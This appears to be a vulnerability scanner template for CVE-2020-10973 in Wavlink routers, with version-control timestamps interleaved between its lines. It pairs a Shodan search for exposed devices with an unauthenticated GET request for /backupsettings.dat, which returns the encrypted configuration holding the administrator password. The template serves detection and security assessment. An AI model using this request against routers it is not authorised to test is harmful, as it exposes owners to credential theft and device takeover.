2022-08-14 11:56:35 +00:00
id : CVE-2020-10973
info :
2023-02-01 16:30:50 +00:00
name : WAVLINK - Access Control
2022-08-14 11:56:35 +00:00
author : arafatansari
2022-08-14 12:39:55 +00:00
severity : high
2022-08-14 11:56:35 +00:00
description : |
2023-02-01 18:23:46 +00:00
Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
2022-08-14 11:56:35 +00:00
reference :
2022-08-20 09:59:46 +00:00
- https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973
2022-08-23 09:22:00 +00:00
- https://github.com/sudo-jtcsec/Nyra
2023-02-01 16:05:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-10973
2023-04-12 10:55:48 +00:00
- https://github.com/Roni-Carta/nyra
2022-08-14 12:37:55 +00:00
classification :
2022-08-23 09:22:00 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-14 12:37:55 +00:00
cve-id : CVE-2020-10973
2022-08-23 09:22:00 +00:00
cwe-id : CWE-306
2023-04-12 10:55:48 +00:00
epss-score : 0.0178
2022-08-14 11:56:35 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-08-20 09:59:46 +00:00
shodan-query : http.html:"Wavlink"
2022-08-23 09:22:00 +00:00
verified : "true"
2022-08-14 12:37:55 +00:00
tags : cve,cve2020,exposure,wavlink
2022-08-14 11:56:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-14 11:56:35 +00:00
- raw :
- |
2022-08-20 09:59:46 +00:00
GET /backupsettings.dat HTTP/1.1
2022-08-14 11:56:35 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2022-08-14 12:23:26 +00:00
part : body
2022-08-14 11:56:35 +00:00
words :
2022-08-20 09:59:46 +00:00
- 'Salted__'
- type : word
part : header
words :
- application/octet-stream
2022-08-14 12:23:26 +00:00
- type : status
status :
- 200
2023-02-01 16:05:22 +00:00
# Enhanced by md on 2023/02/01